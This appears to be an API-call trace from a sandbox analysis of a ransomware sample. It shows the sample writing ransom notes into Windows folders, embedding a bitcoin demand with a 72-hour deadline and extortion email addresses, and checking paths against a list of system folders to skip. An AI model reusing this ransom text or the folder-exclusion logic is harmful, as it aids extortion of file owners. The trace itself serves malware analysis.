	[0158.512] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.513] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0158.514] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.514] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.515] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.515] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.515] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0158.515] CloseHandle (hObject=0x380) returned 1
	[0158.516] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.516] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.517] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.517] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML") returned 64
	[0158.517] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.520] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.520] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0158.523] CloseHandle (hObject=0x380) returned 1
	[0158.524] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.524] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.525] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.526] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0158.527] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.527] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\application data\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.527] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.528] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.528] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0158.528] CloseHandle (hObject=0x380) returned 1
	[0158.529] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\*.*" (normalized: "c:\\users\\all users\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0158.529] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.529] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1
	[0158.529] lstrcmpW (lpString1="Comms", lpString2="..") returned 1
	[0158.529] lstrcmpW (lpString1="Comms", lpString2=".") returned 1
	[0158.529] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.529] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.530] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Comms" | out: lpString1="C:\\Users\\All Users\\Comms") returned="C:\\Users\\All Users\\Comms"
	[0158.530] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Comms" | out: lpString1="C:\\Users\\All Users\\Comms") returned="C:\\Users\\All Users\\Comms"
	[0158.530] lstrcatW (in: lpString1="C:\\Users\\All Users\\Comms", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Comms\\") returned="C:\\Users\\All Users\\Comms\\"
	[0158.530] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Comms\\" | out: lpString1="C:\\Users\\All Users\\Comms\\") returned="C:\\Users\\All Users\\Comms\\"
	[0158.530] lstrcatW (in: lpString1="C:\\Users\\All Users\\Comms\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Comms\\*.*") returned="C:\\Users\\All Users\\Comms\\*.*"
	[0158.530] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Comms\\*.*" (normalized: "c:\\users\\all users\\comms\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0158.531] lstrlenW (lpString="C:\\Users\\All Users\\Comms\\*.*") returned 28
	[0158.531] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.531] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Comms\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\all users\\comms\\*.*") returned 0x1c
	[0158.531] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.532] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="windows") returned 0x0
	[0158.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.532] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="boot") returned 0x0
	[0158.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.532] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="system volume information") returned 0x0
	[0158.532] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.532] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.533] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="temp") returned 0x0
	[0158.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.533] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="program files") returned 0x0
	[0158.533] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.533] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.534] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="appdata") returned 0x0
	[0158.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.534] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="application data") returned 0x0
	[0158.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.534] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="winnt") returned 0x0
	[0158.534] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.535] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="tmp") returned 0x0
	[0158.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.535] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="cache") returned 0x0
	[0158.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.535] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.535] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.536] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="webcache") returned 0x0
	[0158.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.536] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="inetcache") returned 0x0
	[0158.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.536] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="nvidia") returned 0x0
	[0158.536] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.537] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="packages") returned 0x0
	[0158.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.537] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="cookies") returned 0x0
	[0158.537] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.537] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="programdata") returned 0x0
	[0158.537] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.538] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0158.538] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0158.538] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0158.538] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Comms" | out: lpString1="C:\\Users\\All Users\\Comms") returned="C:\\Users\\All Users\\Comms"
	[0158.539] lstrcatW (in: lpString1="C:\\Users\\All Users\\Comms", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Comms\\*.*") returned="C:\\Users\\All Users\\Comms\\*.*"
	[0158.539] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.539] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.539] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.TXT") returned 52
	[0158.539] CreateFileW (lpFileName="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\comms\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.540] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.547] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.551] CloseHandle (hObject=0x380) returned 1
	[0158.552] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.553] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0158.554] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.554] CreateFileW (lpFileName="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\comms\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.554] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.555] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.555] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0158.555] CloseHandle (hObject=0x380) returned 1
	[0158.556] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.557] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.557] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.557] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.HTML") returned 53
	[0158.557] CreateFileW (lpFileName="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\comms\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.558] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.558] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0158.561] CloseHandle (hObject=0x380) returned 1
	[0158.562] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.562] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.563] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.563] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0158.565] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.565] CreateFileW (lpFileName="C:\\Users\\All Users\\Comms\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\comms\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.566] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.566] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.566] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0158.566] CloseHandle (hObject=0x380) returned 1
	[0158.567] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Comms\\*.*" (normalized: "c:\\users\\all users\\comms\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0158.567] lstrlenW (lpString="C:\\Users\\All Users\\Comms\\*.*") returned 28
	[0158.567] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.568] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Comms\\*.*", cchLength=0x1c | out: lpsz="c:\\users\\all users\\comms\\*.*") returned 0x1c
	[0158.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.568] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="windows") returned 0x0
	[0158.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.568] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="boot") returned 0x0
	[0158.568] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.569] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="system volume information") returned 0x0
	[0158.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.569] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.569] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="temp") returned 0x0
	[0158.569] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.570] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="program files") returned 0x0
	[0158.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.570] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.570] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="appdata") returned 0x0
	[0158.570] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.571] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="application data") returned 0x0
	[0158.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.571] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="winnt") returned 0x0
	[0158.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.572] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="tmp") returned 0x0
	[0158.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.572] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="cache") returned 0x0
	[0158.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.572] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.572] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.573] StrStrW (lpFirst="c:\\users\\all users\\comms\\*.*", lpSrch="webcache") returned 0x0
	[0158.573] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
